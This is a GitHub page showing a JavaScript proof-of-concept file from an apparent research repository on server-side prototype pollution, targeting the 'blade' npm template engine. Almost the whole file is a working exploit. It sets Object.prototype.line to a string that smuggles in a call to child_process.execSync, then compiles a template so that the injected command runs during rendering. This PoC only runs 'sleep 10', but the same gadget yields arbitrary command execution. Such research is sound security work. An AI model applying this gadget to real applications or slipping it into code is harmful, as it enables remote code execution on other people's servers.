server-side-prototype-pollution/npm-packages/node-blade/app-5.js at main · jackfromeast/server-side-prototype-pollution · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
const blade = require('blade');

Object.prototype.line = "1\nglobal.process.mainModule.require('child_process').execSync('sleep 10')\n"
Object.prototype.value = "somevalue" // helper property, bladejs/lib/parser/index.js::1316

const template = `html
    head
        title Blade
    body
        #nav
            ul
                - for(var i in nav)
                    li
                        a(href=nav[i])= i
        #content.center
            h1 Blade is cool`;

blade.compile(template, {'debug': true}, function(err, tmpl) {
    console.log(err);
    tmpl({'nav': []}, function(err, html) {
        console.log(html, err);
    });
});